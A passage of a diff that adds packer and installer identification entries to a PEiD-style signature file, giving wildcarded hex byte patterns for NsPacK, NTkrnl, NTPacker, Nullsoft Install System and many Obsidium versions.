+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00
+ep_only = false
+
+[NsPacK V3.3 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 00 74
+ep_only = true
+
+[NsPacK V3.4-V3.5 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84
+ep_only = true
+
+[NsPacK V3.6 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00
+ep_only = true
+
+[NsPacK V3.7 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00
+ep_only = true
+
+[NTkrnl Secure Suite -> NTkrnl team]
+signature = 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73
+ep_only = false
+
+[NTkrnl Secure Suite 0.1-0.15 -> NTkrnl Software]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 68 ?? ?? ?? ?? E8 01 00 00 00 C3 C3
+ep_only = false
+
+[NTkrnl Secure Suite 0.1-0.15 DLL -> NTkrnl Software]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 8B 44 24 04 05 ?? ?? ?? ?? 50 E8 01 00 00 00 C3 C3
+ep_only = false
+
+[NTKrnlPacker -> Ashkbiz Danehkar]
+signature = 00 00 00 00 00 00 00 00 00 00 00 00 34 10 00 00 28 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 41 10 00 00 50 10 00 00 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74
+ep_only = false
+
+[NTPacker 1.0 -> ErazerZ]
+signature = 55 8B EC 83 C4 E0 53 33 C0 89 45 E0 89 45 E4 89 45 E8 89 45 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 8D 4D EC BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FC FF FF 8B 55 EC B8 ?? ?? 40 00 E8 ?? ?? FF FF 8D 4D E8 BA ?? ?? 40 00 A1 ?? ?? 40 00 E8 ?? FE FF FF 8B 55 E8 B8 ?? ?? 40 00 E8 ?? ?? FF FF B8 ?? ?? 40 00 E8 ?? FB FF FF 8B D8 A1 ?? ?? 40 00 BA ?? ?? 40 00 E8 ?? ?? FF FF 75 26 8B D3 A1 ?? ?? 40 00 E8 ?? ?? FF FF 84 C0 75 2A 8D 55 E4 33 C0 E8 ?? ?? FF FF 8B 45 E4 8B D3 E8 ?? ?? FF FF EB 14 8D 55 E0 33 C0 E8 ?? ?? FF FF 8B 45 E0 8B D3 E8 ?? ?? FF FF 6A 00 E8 ?? ?? FF FF 33 C0 5A 59 59 64 89 10 68 ?? ?? 40 00 8D 45 E0 BA 04 00 00 00 E8 ?? ?? FF FF C3 E9 ?? ?? FF FF EB EB 5B E8 ?? ?? FF FF 00 00 00 FF FF FF FF 01 00 00 00 25 00 00 00 FF FF FF FF 01 00 00 00 5C 00 00 00 FF FF FF FF 06 00 00 00 53 45 52 56 45 52 00 00 FF FF FF FF 01 00 00 00 31
+ep_only = true
+
+[NTPacker V2.X -> ErazerZ]
+signature = 4B 57 69 6E 64 6F 77 73 00 10 55 54 79 70 65 73 00 00 3F 75 6E 74 4D 61 69 6E 46 75 6E 63 74 69 6F 6E 73 00 00 47 75 6E 74 42 79 70 61 73 73 00 00 B7 61 50 4C 69 62 75 00 00 00
+ep_only = false
+
+[Nullsoft Install System v1.98]
+signature = 83 EC 0C 53 56 57 FF 15 2C 81 40
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 55 8B EC 83 EC 2C 53 56 33 F6 57 56 89 75 DC 89 75 F4 BB A4 9E 40 00 FF 15 60 70 40 00 BF C0 B2 40 00 68 04 01 00 00 57 50 A3 AC B2 40 00 FF 15 4C 70 40 00 56 56 6A 03 56 6A 01 68 00 00 00 80 57 FF 15 9C 70 40 00 8B F8 83 FF FF 89 7D EC 0F 84 C3 00 00 00
+ep_only = true
+
+[Nullsoft Install System v1.xx]
+signature = 83 EC 0C 53 56 57 FF 15 20 71 40 00 05 E8 03 00 00 BE 60 FD 41 00 89 44 24 10 B3 20 FF 15 28 70 40 00 68 00 04 00 00 FF 15 28 71 40 00 50 56 FF 15 08 71 40 00 80 3D 60 FD 41 00 22 75 08 80 C3 02 BE 61 FD 41 00 8A 06 8B 3D F0 71 40 00 84 C0 74 0F 3A C3 74
+ep_only = true
+
+[Nullsoft Install System v2.0]
+signature = 83 EC 0C 53 55 56 57 C7 44 24 10 70 92 40 00 33 DB C6 44 24 14 20 FF 15 2C 70 40 00 53 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 2D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00
+ep_only = false
+
+[Nullsoft Install System v2.0 RC2]
+signature = 83 EC 10 53 55 56 57 C7 44 24 14 70 92 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 84 72 40 00 BE 00 54 43 00 BF 00 04 00 00 56 57 A3 A8 EC 42 00 FF 15 C4 70 40 00 E8 8D FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 5C 71 40 00
+ep_only = false
+
+[Nullsoft Install System v2.0a0]
+signature = 83 EC 0C 53 56 57 FF 15 B4 10 40 00 05 E8 03 00 00 BE E0 E3 41 00 89 44 24 10 B3 20 FF 15 28 10 40 00 68 00 04 00 00 FF 15 14 11 40 00 50 56 FF 15 10 11 40 00 80 3D E0 E3 41 00 22 75 08 80 C3 02 BE E1 E3 41 00 8A 06 8B 3D 14 12 40 00 84 C0 74 19 3A C3 74
+ep_only = false
+
+[Nullsoft Install System v2.0b2, v2.0b3]
+signature = 83 EC 0C 53 55 56 57 FF 15 ?? 70 40 00 8B 35 ?? 92 40 00 05 E8 03 00 00 89 44 24 14 B3 20 FF 15 2C 70 40 00 BF 00 04 00 00 68 ?? ?? ?? 00 57 FF 15 ?? ?? 40 00 57 FF 15
+ep_only = true
+
+[Nullsoft Install System v2.0b4]
+signature = 83 EC 10 53 55 56 57 C7 44 24 14 F0 91 40 00 33 ED C6 44 24 13 20 FF 15 2C 70 40 00 55 FF 15 88 72 40 00 BE 00 D4 42 00 BF 00 04 00 00 56 57 A3 60 6F 42 00 FF 15 C4 70 40 00 E8 9F FF FF FF 8B 1D 90 70 40 00 85 C0 75 21 68 FB 03 00 00 56 FF 15 60 71 40 00
+ep_only = false
+
+[Nullsoft Install System v2.0b4]
+signature = 83 EC 14 83 64 24 04 00 53 55 56 57 C6 44 24 13 20 FF 15 30 70 40 00 BE 00 20 7A 00 BD 00 04 00 00 56 55 FF 15 C4 70 40 00 56 E8 7D 2B 00 00 8B 1D 8C 70 40 00 6A 00 56 FF D3 BF 80 92 79 00 56 57 E8 15 26 00 00 85 C0 75 38 68 F8 91 40 00 55 56 FF 15 60 71
+ep_only = false
+
+[Nullsoft PIMP Install System v1.3x]
+signature = 55 8B EC 81 EC ?? ?? 00 00 56 57 6A ?? BE ?? ?? ?? ?? 59 8D BD
+ep_only = true
+
+[Nullsoft PiMP Install System v1.x]
+signature = 83 EC 0C 53 56 57 FF 15 ?? ?? 40 00 05 E8 03 00 00 BE ?? ?? ?? 00 89 44 24 10 B3 20 FF 15 28 ?? 40 00 68 00 04 00 00 FF 15 ?? ?? 40 00 50 56 FF 15 ?? ?? 40 00 80 3D ?? ?? ?? 00 22 75 08 80 C3 02 BE ?? ?? ?? 00 8A 06 8B 3D ?? ?? 40 00 84 C0 74 ?? 3A C3 74
+ep_only = false
+
+[Nullsoft PIMP Install System v1.x]
+signature = 83 EC 5C 53 55 56 57 FF 15 ?? ?? ?? 00
+ep_only = true
+
+[NX PE Packer v1.0]
+signature = FF 60 FF CA FF 00 BA DC 0D E0 40 00 50 00 60 00 70 00 80 00
+ep_only = true
+
+[Obsidium 1.2.0.0 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 3F 1E 00 00
+ep_only = true
+
+[Obsidium 1.2.5.8 -> Obsidium Software]
+signature = EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 01 ?? E8 7B 21 00 00
+ep_only = true
+
+[Obsidium 1.3.0.0 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 29 00 00 00 EB 02 ?? ?? EB 01 ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 22 EB 02 ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 01 ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 47 26 00 00
+ep_only = true
+
+[Obsidium 1.3.0.13 -> Obsidium Software]
+signature = EB 01 ?? E8 26 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 21 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 02 ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 03 ?? ?? ?? E8 13 26 00 00
+ep_only = true
+
+[Obsidium 1.3.0.17 -> Obsidium software]
+signature = EB 02 ?? ?? E8 28 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04
+ep_only = true
+
+[Obsidium 1.3.0.21 -> Obsidium Software]
+signature = EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00
+ep_only = true
+
+[Obsidium 1.3.0.37 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 26 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 26 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 01 ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00
+ep_only = true
+
+[Obsidium 1.3.1.1 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 01 ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 03 ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03
+ep_only = true
+
+[Obsidium 1.3.2.2 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 02 ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 01 ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 04
+ep_only = true
+
+[Obsidium 1.3.3.1 -> Obsidium Software]
+signature = EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00
+ep_only = true
+
+[Obsidium 1.3.3.2 -> Obsidium Software]
+signature = EB 01 ?? E8 2B 00 00 00 EB 02 ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 02 ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 01 ?? 58 EB 01 ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 02 ?? ?? E8 3B 27 00 00
+ep_only = true
+
+[Obsidium 1.3.3.3 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04
+ep_only = true
+
+[Obsidium 1.3.3.3 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 28 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 01 ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 27
+ep_only = true
+
+[Obsidium 1.3.3.4 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33
+ep_only = true
+
+[Obsidium 1.3.3.4 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 25 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 03
+ep_only = true
+
+[Obsidium 1.3.3.6 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? ?? ?? ?? ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 50 EB 01 ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 03 ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04
+ep_only = false
+
+[Obsidium 1.3.3.7 (2007.06.23) -> Obsidium Software]
+signature = EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00
+ep_only = true
+
+[Obsidium 1.3.3.7 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00
+ep_only = true
+
+[Obsidium 1.3.3.8 -> Obsidium Software]
+signature = EB 04 ?? ?? ?? ?? E8 28 00 00 00 EB 01 ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 ?? EB 04 ?? ?? ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 01 ?? EB 01 ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 57 27 00 00
+ep_only = true
+
+[Obsidium 1.3.3.9 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 29 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 28 EB 02 ?? ?? 33 C0 EB 02 ?? ?? C3 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 03 ?? ?? ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 04 ?? ?? ?? ?? E9 FA 00 00 00 EB 03 ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 CF 27 00 00
+ep_only = true
+
+[Obsidium 1.3.4.1 -> Obsidium Software]
+signature = EB 01 ?? E8 2A 00 00 00 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 21 EB 02 ?? ?? 33 C0 EB 03 ?? ?? ?? C3 EB 02 ?? ?? EB 01 ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 04 ?? ?? ?? ?? 83 C4 04 EB 02 ?? ?? E8 C3 27 00 00
+ep_only = true
+
+[Obsidium v1.1.1.1]
+signature = EB 02 ?? ?? E8 E7 1C 00 00
+ep_only = true
+
+[Obsidium V1.2 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 77 1E 00 00
+ep_only = true
+
+[Obsidium v1.2.5.0 -> Obsidium Software]
+signature = E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00
+ep_only = true
+
+[Obsidium V1.2.5.8 -> Obsidium Software]
+signature = EB 01 ?? E8 ?? 00 00 00
+ep_only = true
+
+[Obsidium V1.2.5.8-V1.3.3.X -> Obsidium Software]
+signature = EB 01 ?? E8 ?? 00 00 00 EB 02 ?? ?? EB
+ep_only = true
+
+[Obsidium V1.2.X -> Obsidium Software]
+signature = E8 0E 00 00 00 33 C0 8B 54 24 0C 83 82 B8 00 00 00 0D C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00
+ep_only = true
+
+[Obsidium V1.25 -> Obsidium Software]
+signature = E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3
+ep_only = true
+
+[Obsidium v1.3.0.0 -> Obsidium Software]
+signature = EB 04 25 80 34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B
+ep_only = true
+
+[Obsidium v1.3.0.0 -> Obsidium Software]
